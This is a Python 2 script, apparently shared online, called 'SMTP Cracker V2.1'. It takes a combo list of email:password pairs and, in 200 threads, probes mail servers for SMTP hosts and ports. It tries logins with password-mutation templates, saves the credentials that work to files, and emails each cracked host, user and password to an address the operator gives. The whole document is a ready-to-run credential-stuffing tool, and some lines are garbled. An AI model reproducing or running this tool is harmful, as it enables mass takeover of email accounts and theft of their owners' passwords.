2 years ago
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#!/usr/bin/env python # -*- coding: utf-8 -*- #Coded By ARON-TN #Don't Change copyright Mother Fucker :) #Tunisia Coderz #Tool Finished In : 01:22 10/03/2019 #Tool Fixed in : 15:33 10/06/2019 import os,socket,threading,base64,datetime,sys,ssl,imaplib,time,re,uuid try: if'nt': os.system('cls') else: os.system('clear') except: print("\033[91mERROR :| \nConatct ARON-TN AS u LIKE !\033[00m") msg0 ="\033[91m########## verified Your modules ########" for i in msg0: sys.stdout.write(i) sys.stdout.flush() time.sleep(0.02) try: import Queue except: print"\033[91m[\033[92m?\033[91m] Installing Queue Module\033[00m" if'nt': try: os.system('C:\Python27\Scripts\pip2.exe install Queue') import Queue except: print "Install Python-Pip Sir" raw_input('') else: try: os.system('pip2 install Queue') import Queue except: print "\033[91mTry To Install pip2 For Your Devices And Try 'root@usr:~$ pip2 install Queue'\033[00m" try: import requests except: print"\033[91m[\033[92m?\033[91m] Installing requests Module\033[00m" if'nt': try: os.system('C:\Python27\Scripts\pip2.exe install requests') except: print "Install Python-Pip Sir" raw_input('') else: os.system('pip2 install requests') try: import colorama except: print"\033[91m[\033[92m?\033[91m] Installing colorama Module\033[00m" if'nt': try: os.system('C:\Python27\Scripts\pip2.exe install colorama') except: print "Install Python-Pip Sir" raw_input('') else: os.system('pip2 install colorama') msg00 ="\n\033[92m##### GOOd Now You have all modules #####\n\033[0;96m############## Let's start ##############\033[92m\n" for i in msg00: sys.stdout.write(i) sys.stdout.flush() time.sleep(0.02) def aron(): try: if'nt': os.system('cls && cd Smtp-cracker &&') else: os.system('clear && cd Smtp-cracker && python2') except: print("\033[91mERROR :| \nConatct ARON-TN AS u LIKE !\033[00m") to_check={} from colorama import * init() print '\033[1m' class IMAP4_SSL(imaplib.IMAP4_SSL): def __init__(self, host='', port=imaplib.IMAP4_SSL_PORT, keyfile=None, certfile=None, ssl_version=None, ca_certs=None, ssl_ciphers=None,timeout=40): self.ssl_version = ssl_version self.ca_certs = ca_certs self.ssl_ciphers = ssl_ciphers self.timeout=timeout imaplib.IMAP4_SSL.__init__(self, host, port, keyfile, certfile) def open(self, host='', port=imaplib.IMAP4_SSL_PORT): = host self.port = port self.sock = socket.create_connection((host, port),self.timeout) extra_args = {} if self.ssl_version: extra_args['ssl_version'] = self.ssl_version if self.ca_certs: extra_args['cert_reqs'] = ssl.CERT_REQUIRED extra_args['ca_certs'] = self.ca_certs if self.ssl_ciphers: extra_args['ciphers'] = self.ssl_ciphers self.sslobj = ssl.wrap_socket(self.sock, self.keyfile, self.certfile, **extra_args) self.file = self.sslobj.makefile('rb') class checkerr(threading.Thread): def __init__(self,host,user,pwd,timeout,interval): t=threading.Thread.__init__(self) self.user=user self.pwd=pwd self.interval=interval self.timeout=timeout self.connected=False self.i=None self.attemp=4 self.inbox='' self.spam='' def connect(self): try: i=IMAP4_SSL(,port=993) i.login(self.user,self.pwd) self.i=i self.connected=True except Exception,e: i.close() self.connected=False def find(self): global to_check if self.inbox=='': rez,folders=self.i.list() for f in folders: if '"|" ' in f: a=f.split('"|" ') elif '"/" ' in f: a=f.split('"/" ') folder=a[1].replace('"','') if self.inbox=="": if 'inbox' in folder.lower(): self.inbox=folder elif self.spam=="": if 'spam' in folder.lower(): self.spam=folder if self.spam=='': for f in folders: if '"|" ' in f: a=f.split('"|" ') elif '"/" ' in f: a=f.split('"/" ') folder=a[1].replace('"','') if self.spam=="": if 'trash' in folder: self.spam=folder else: break found=[] for k,t in enumerate(to_check):,'SUBJECT',t[0]) times=time.time()-t[1] if times-2>self.timeout: found.append(k) if len(rez)>0: found.append(k) for k,t in enumerate(to_check):,'SUBJECT',t[0]) times=time.time()-t[1] if times-2>self.timeout: found.append(k) if len(rez)>0: found.append(k) new=[] for k,v in enumerate(to_check): if k not in found: new.append(v) to_check=new print '\033[91m[\033[92m+\033[91m]\033[92mChecking for emails\033[97m '+to_check+'\n' def run(self): global to_checks while if not self.connected: if self.attemp<=0: return 0 self.connect() self.attemp-=1 if len(to_check)>0: self.find() time.sleep(self.interval) def tld2(dom): global tlds if "." not in dom: return "" dom=dom.lower() parts=dom.split(".") if len(parts)<2 or parts[0]=="" or parts[1]=="": return "" tmp=parts[-1] for i,j in enumerate(parts[::-1][1:5]): try: tmp=tlds[tmp] tmp=j+"."+tmp except: if i==0: return "" return tmp return tmp class consumer(threading.Thread): def __init__(self,qu): threading.Thread.__init__(self) self.q=qu self.hosts=["","smtp.","mail.","webmail.","secure.","plus.smtp.","smtp.mail.","smtp.att.","pop3.","securesmtp.","outgoing.","smtp-mail.","plus.smtp.mail.","Smtpauths.","Smtpauth."] self.ports=[587,465,25] self.timeout=13 def sendCmd(self,sock,cmd): sock.send(cmd+"\r\n") return sock.recv(900000) def addBad(self,ip): global bads,rbads if rbads: bads.append(ip) return -1 def findHost(self,host): print '\033[91m[\033[92m*\033[91m]\033[92mSearching smtp host and port on \033[97m'+host+'\n' global cache,bads,rbads s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.setblocking(0) s.settimeout(self.timeout) try: d=cache[host] try: if self.ports[d[1]]==465: s=ssl.wrap_socket(s) s.connect((self.hosts[d[0]]+host,self.ports[d[1]])) return s except Exception,e: if rbads: bads.append(host) return None except KeyError: pass cache[host]=[-1,-1] for i,p in enumerate(self.ports): for j,h in enumerate(self.hosts): print '\033[91m[\033[92m*\033[91m]\033[92mTrying connection on\033[97m '+h+host+':'+str(p)+'\n' try: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.setblocking(0) s.settimeout(self.timeout) if p==465: s=ssl.wrap_socket(s) s.connect((h+host,p)) cache[host]=[j,i] return s except Exception,e: continue bads.append(host) del cache[host] return None def getPass(self,passw,user,domain): passw=str(passw) if '%null%' in passw: return "" elif '%user%' in passw: user=user.replace('-','').replace('.','').replace('_','') return passw.replace('%user%',user) elif '%User%' in user: user=user.replace('-','').replace('.','').replace('_','') return passw.replace('%User%',user) elif '%special%' in user: user=user.replace('-','').replace('.','').replace('_','').replace('e','3').replace('i','1').replace('a','@') return passw.replace('%special%',user) elif '%domain%' in passw: return passw.replace('%domain%',domain.replace("-","")) if '%part' in passw: if '-' in user: parts=user.split('-') elif '.' in user: parts=user.split('.') elif '_' in user: parts=user.split('_') try: h=passw.replace('%part','').split('%')[0] i=int(h) p=passw.replace('%part'+str(i)+'%',parts[i-1]) return p except Exception,e: return None return passw def connect(self,tupple,ssl=False): global bads,cracked,cache,email host=tupple[0].rstrip() host1=host user=tupple[1].rstrip() if host1 in cracked or host1 in bads: return 0 passw=self.getPass(tupple[2].rstrip(),user.rstrip().split('@')[0],host.rstrip().split('.')[0]) if passw==None: return 0 try: if cache[host][0]==-1: return 0 except KeyError: pass s=self.findHost(host) if s==None: return -1 port=str(self.ports[cache[host][1]]) if port=="465": port+="(SSL)" host=self.hosts[cache[host][0]]+host print '\033[91m[\033[92m*\033[91m]\033[92mTrying > \033[97m'+host+":"+port+":"+user+":"+passw+'\n' try: banner=s.recv(1024) if banner[0:3]!="220": self.sendCmd(s,'QUIT') s.close() return self.addBad(host1) rez=self.sendCmd(s,"EHLO ADMIN") rez=self.sendCmd(s,"AUTH LOGIN") if rez[0:3]!='334': self.sendCmd(s,'QUIT') s.close() return self.addBad(host1) rez=self.sendCmd(s,base64.b64encode(user)) if rez[0:3]!='334': self.sendCmd(s,'QUIT') s.close() return self.addBad(host1) rez=self.sendCmd(s,base64.b64encode(passw)) if rez[0:3]!="235" or 'fail' in rez: self.sendCmd(s,'QUIT') s.close() return 0 print '\n\033[93m[\033[90m>\033[00m]\033[91m B000M Cracked >\033[97m '+host+':'+port+' '+user+' '+passw+'\n' save=open('cracked_smtps.txt','a').write(host+":"+port+","+user+","+passw+"\n") save=open('cracked_Mailaccess.txt','a').write(user+":"+passw+"\n") cracked.append(host1) rez=self.sendCmd(s,"RSET") if rez[0:3]!='250': self.sendCmd(s,'QUIT') s.close() return self.addBad(host1) rez=self.sendCmd(s,"MAIL FROM: <"+user+">") if rez[0:3]!='250': self.sendCmd(s,'QUIT') s.close() return self.addBad(host1) rez=self.sendCmd(s,"RCPT TO: <"+email+">") if rez[0:3]!='250': self.sendCmd(s,'QUIT') s.close() return self.addBad(host1) rez=self.sendCmd(s,'DATA') headers='From: <'+user+'> ARON-TN\r\n' headers+='To: '+email+'\r\n' headers+='Reply-To: '+email+'\r\n' headers+='Subject: SMTP Cracker User-ID Num: ['+randomString+']\r\n' headers+='MIME-Version: 1.0\r\n' headers+='Content-Transfer-encoding: 8bit\r\n' headers+="Content-type: text/html; charset=utf-8\r\n"; headers+='Return-Path: %s\r\n'%user headers+='X-Priority: 1\r\n' headers+='X-MSmail-Priority: High\r\n' headers+='X-Mailer: Microsoft Office Outlook, Build 11.0.5510\r\n' headers+='X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441\r\n' headers+='''<!DOCTYPE html> <html> <head> </head> <body> <center> <br><br><br> <h1>[ > ]New Smtp Cracker V2.1 [ < ]</h1> <br> <font color="#f16f6f"><h1>[ ! ]Developped by ARON-TN [ ! ]</h1></font><br><br><br> <font size="6" color="red">/!\ WARNING /!\ <br><font color="red" size="6" ><"/">i don't accept any responsibility for any illegal usage !</font><"/"></font><br><br> <font color="black" size="5" ><font color="red">Host :</font> '''+host+''' </font><br><br> <font color="black" size="5" ><font color="red">Port :</font> '''+port+'''<br><br></font> <font color="black" size="5" ><font color="red">Email :</font> '''+user+'''<br><br></font> <font color="black" size="5" ><font color="red">Password :</font> '''+passw+'''<br><br></font> <center><img src=""/> </center><br><br><br> <font color="black" size="5" ><font color="red">Email :</font> <br><br></font> <font color="black" size="5" ><font color="red">Youtube :</font> <a href="">Click HEre</a><br><br></font> <h2>© ARON-TN 2017-2019</h2> </body> </html>\r\n.\r\n''' s.send(headers) rez=s.recv(1000) self.sendCmd(s,'QUIT') s.close() except Exception,e: s.close() return self.addBad(host1) def run(self): while True: cmb=self.q.get() self.connect(cmb) self.q.task_done() randomString = uuid.uuid4().hex randomString = randomString.upper()[0:7] quee=Queue.Queue(maxsize=20000) try: os.remove('about.txt') except: pass save=open('about.txt','a').write('Hello \n Welcome Again Smtp Cracker Available & Fixed :) \n [+] Developped By ARON-TN \n Thanks To : #Mr.Zack ** #Alpicino \n [*] Youtube >') tld=open('about.txt','r').read().splitlines() tlds=cache={} bads=[] cracked=[] rbads=0 vers=requests.get('').text.encode('utf-8') print(''' \033[0;96m_ _ \033[93m______ __ __ ________ _______ \033[0;96m_ _ (c).-.(c) \033[93m/ \ / \ / |/ |/ \ \033[0;96m(c).-.(c) / ._. \ \033[93m/$$$$$$ |$$ \ /$$ |$$$$$$$$/ $$$$$$$ | \033[0;96m/ ._. \ __\( Y )/__ \033[93m$$ \__$$/ $$$ \ /$$$ | $$ | $$ |__$$ | \033[0;96m__\( Y )/__ (_.-/'-'\-._) \033[93m$$ \ $$$$ /$$$$ | $$ | $$ $$/ \033[0;96m(_.-/'-'\-._) || A || \033[93m$$$$$$ |$$ $$ $$/$$ | $$ | $$$$$$$/ \033[0;96m|| R || _.' `-' '._ \033[93m/ \__$$ |$$ |$$$/ $$ | $$ | $$ | \033[0;96m_.' `-' '._ (.-./`-'\.-.) \033[93m$$ $$/ $$ | $/ $$ | $$ | $$ | \033[0;96m(.-./`-'\.-.) `-' `-' \033[93m$$$$$$/ $$/ $$/ $$/ $$/ \033[0;96m`-' `-' \033[91m[\033[92m+\033[91m]\033[1m(C)opyright >\033[91m [\033[92m+\033[91m] \033[91m[\033[92m+\033[91m]\033[95m SMTP CRACKER V2.1 DEVEL BY ARON-TN \033[91m[\033[92m+\033[91m] \033[91m[\033[92m+\033[91m]\033[92m EMail : \033[91m[\033[92m+\033[91m] \033[91m[\033[92m+\033[91m]\033[94m Facebook > \033[91m[\033[92m+\033[91m] \033[91m[\033[92m+\033[91m] Youtube > \033[91m[\033[92m+\033[91m]''') ms0g ="\n\033[93mChecking\033[0;96m Your\033[91m Version (%s)\033[92m "%vers for i in ms0g: sys.stdout.write(i) sys.stdout.flush() time.sleep(0.02) if vers=='2.1': print('{>} Good You have last version \n') else: print("\033[91mThere is New Version available !! Do you Want To Update Your tool ? \033[00m") ok=raw_input(''' \033[91m[\033[94m1\033[91m]\033[00m YEs \033[91m[\033[94m2\033[91m]\033[00m No \033[91m[\033[94m>\033[91m]\033[00m : ''') if ok=='1': aroon ="\n Update Strated !\n" for i in aroon: sys.stdout.write(i) sys.stdout.flush() time.sleep(0.02) os.remove(sys.argv[0]) os.system('git clone && cd Smtp-cracker') if'nt': os.system('cls') else: os.system('clear') os.system('') elif ok=='2': pass try: inputs=open(raw_input('\033[91m[\033[92m+\033[91m]\033[92m Combo Name : \033[97m'),'r').read().splitlines() except: sys.exit("\n\033[91m{!} Your File not Founded\033[00m") email=raw_input('\033[91m[\033[92m+\033[91m]\033[92m Enter Your Email :\033[97m ') thret=200 def part(): global tld,tlds for i in tld: tlds[i]=i part() msg ="\n\033[91mConnecting ..........." for i in msg: sys.stdout.write(i) sys.stdout.flush() time.sleep(0.2) for i in range(int(thret)): try: t=consumer(quee) t.setDaemon(True) t.start() except: print "\033[91m{!} Working only with %s threads\033[00m"%i break try: for i in inputs: user = i.split(':')[0] password = i.split(':')[1] user = user.lower() quee.put((user.split('@')[1], user, password)) except: pass quee.join()